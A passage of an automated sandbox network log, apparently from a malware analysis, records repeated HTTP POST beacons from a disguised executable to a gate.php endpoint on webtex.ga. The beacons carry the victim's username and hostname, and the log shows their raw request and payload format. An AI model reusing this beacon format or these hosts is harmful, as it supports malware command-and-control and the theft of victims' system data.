                                    Dec 3, 2020 10:02:48.713865042 CET230OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:48.731432915 CET230OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:48.774087906 CET231INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:06 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    54192.168.2.34977347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:49.003809929 CET232OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:49.024502039 CET232OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:49.067827940 CET232INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:06 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    55192.168.2.34977447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:49.292978048 CET233OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:49.310477972 CET233OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:49.354669094 CET233INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:06 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    56192.168.2.34977547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:49.591345072 CET234OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:49.609148979 CET235OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:49.830852985 CET235INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:06 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    57192.168.2.34977647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:50.060343981 CET236OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:50.076945066 CET236OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:50.125688076 CET236INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:07 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    58192.168.2.34977747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:50.360534906 CET237OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:50.377321005 CET237OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:50.424429893 CET238INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:07 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    59192.168.2.34977847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:50.664604902 CET238OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:50.681318998 CET239OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:50.723849058 CET239INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:07 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    6192.168.2.34971547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:31.524698019 CET72OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:31.541438103 CET73OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:31.584800959 CET73INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:48 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    60192.168.2.34977947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:50.972121954 CET240OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:50.988794088 CET240OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:51.037888050 CET240INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:08 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    61192.168.2.34978047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:51.261332035 CET241OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:51.278279066 CET241OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:51.322457075 CET242INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:08 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    62192.168.2.34978147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:51.534735918 CET242OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:51.551362991 CET243OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:51.601372957 CET243INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:08 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    63192.168.2.34978247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:51.849829912 CET244OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:51.866547108 CET244OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:51.905245066 CET244INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:09 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    64192.168.2.34978347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:52.137412071 CET245OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:52.155184031 CET245OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:52.196885109 CET246INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:09 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    65192.168.2.34978447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:52.444505930 CET247OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:52.463078976 CET247OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:52.504973888 CET247INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:09 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    66192.168.2.34978547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:52.774910927 CET248OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:52.791559935 CET248OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:52.833587885 CET249INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:10 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    67192.168.2.34978647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:53.118413925 CET249OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:53.135096073 CET250OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:53.234137058 CET251INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:10 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    68192.168.2.34978847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:53.460521936 CET253OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:53.477176905 CET253OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:53.519107103 CET253INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:10 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    69192.168.2.34978947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:53.749877930 CET261OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:53.766536951 CET265OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:53.808731079 CET266INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:11 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    7192.168.2.34971647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:31.827446938 CET74OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:31.844048977 CET74OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:31.881911039 CET74INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:49 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    70192.168.2.34979047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:54.121372938 CET266OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:54.138052940 CET267OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
